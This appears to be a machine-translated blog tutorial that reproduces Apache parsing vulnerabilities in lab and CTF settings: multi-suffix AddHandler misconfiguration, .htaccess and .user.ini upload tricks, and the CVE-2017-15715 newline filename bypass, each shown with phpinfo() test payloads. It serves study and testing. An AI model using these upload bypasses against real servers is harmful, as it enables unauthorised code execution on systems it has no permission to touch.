当前位置:网站首页>Middleware vulnerability recurrence Apache
Middleware vulnerability recurrence Apache
2022-07-06 13:57:00 【Lazy and talented】
Catalog
0x0a httpd-conf Improper configuration ( Multiple file name parsing vulnerability )
0x0b .htaccess Parsing vulnerabilities
0x0c .user.ini Parsing vulnerabilities
Environmental Science ctfshow web 153
principle :php File contains .user.ini
0x0d Apache HTTPD Newline parsing vulnerability (CVE-2017-15715)
Affects version :2.4.0~2.4.29 edition
0x0a httpd-conf Improper configuration ( Multiple file name parsing vulnerability )
AddHandler application/x-httpd-php .php
In the case of multiple suffixes , As long as it contains .php suffix , Can be identified as PHP file .
Local reproduction :
Edit the file h:ttpd-conf(apache/conf/http-conf):
add to :AddHandler application/x-httpd-php .php
Edit the file :phpinfo.php.jpg
write in :<?php phpinfo();?>
visit :127.0.0.1/phpinfo.php.jpg
0x0b .htaccess Parsing vulnerabilities
AddType application/x-httpd-php .jpg Under this path jpg File by http Will be interpreted as php file
Local reproduction :
Upload .htaccess file ( Local )
edit :AddType application/x-httpd-php .jpg
Upload phpinfo.jpg file ( Local )
edit :GIF89a<?php phpinfo();?>
visit : 127.0.0.1/phpinfo.jpg
0x0c .user.ini Parsing vulnerabilities
Environmental Science ctfshow web 153
principle :php File contains .user.ini
auto_append_file=filename // Each of the peer directories php Add... At the end of the file include(“filename”)
auto_prepend_file=filename // Add include(“filename”)
Upload 1.png
<?php phpinfo();?>
Be careful : Then access any one under the file php that will do Because there is index.php So you don't need to upload php To analyze
0x0d Apache HTTPD Newline parsing vulnerability (CVE-2017-15715)
Environmental Science :vulhub
Affects version :2.4.0~2.4.29 edition
Environment startup :
- stay CVE-2017-15715 Right click the folder to open the terminal
- sudo docker-compose up -d
- visit ip+8000
burp Grab the bag Modify parameter value
stay evil.php Back plus c——> Choose code modify ——>0a
visit url:192.168.0.10:8080/evil.php%oa
summary : Mind mapping
边栏推荐
- FAQs and answers to the imitation Niuke technology blog project (I)
- Custom RPC project - frequently asked questions and explanations (Registration Center)
- 编写程序,模拟现实生活中的交通信号灯。
- Get started with typescript
- 【MySQL-表结构与完整性约束的修改(ALTER)】
- [the Nine Yang Manual] 2021 Fudan University Applied Statistics real problem + analysis
- 实验九 输入输出流(节选)
- [hand tearing code] single case mode and producer / consumer mode
- Miscellaneous talk on May 27
- String ABC = new string ("ABC"), how many objects are created
猜你喜欢
Nuxtjs quick start (nuxt2)
强化学习基础记录
. Net6: develop modern 3D industrial software based on WPF (2)
MySQL lock summary (comprehensive and concise + graphic explanation)
2022泰迪杯数据挖掘挑战赛C题思路及赛后总结
SRC mining ideas and methods
Yugu p1012 spelling +p1019 word Solitaire (string)
深度强化文献阅读系列(一):Courier routing and assignment for food delivery service using reinforcement learning
Nuxtjs快速上手(Nuxt2)
仿牛客技术博客项目常见问题及解答(一)
随机推荐
【MySQL数据库的学习】
[the Nine Yang Manual] 2018 Fudan University Applied Statistics real problem + analysis
Difference and understanding between detected and non detected anomalies
Using qcommonstyle to draw custom form parts
Miscellaneous talk on May 27
Meituan dynamic thread pool practice ideas, open source
Experiment 4 array
1. Preliminary exercises of C language (1)
(原创)制作一个采用 LCD1602 显示的电子钟,在 LCD 上显示当前的时间。显示格式为“时时:分分:秒秒”。设有 4 个功能键k1~k4,功能如下:(1)k1——进入时间修改。
Redis实现分布式锁原理详解
2022 Teddy cup data mining challenge question C idea and post game summary
7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
UGUI—Text
Brief introduction to XHR - basic use of XHR
Experiment 7 use of common classes (correction post)
[面试时]——我如何讲清楚TCP实现可靠传输的机制
Safe driving skills on ice and snow roads
【educoder数据库实验 索引】
【头歌educoder数据表中数据的插入、修改和删除】
String ABC = new string ("ABC"), how many objects are created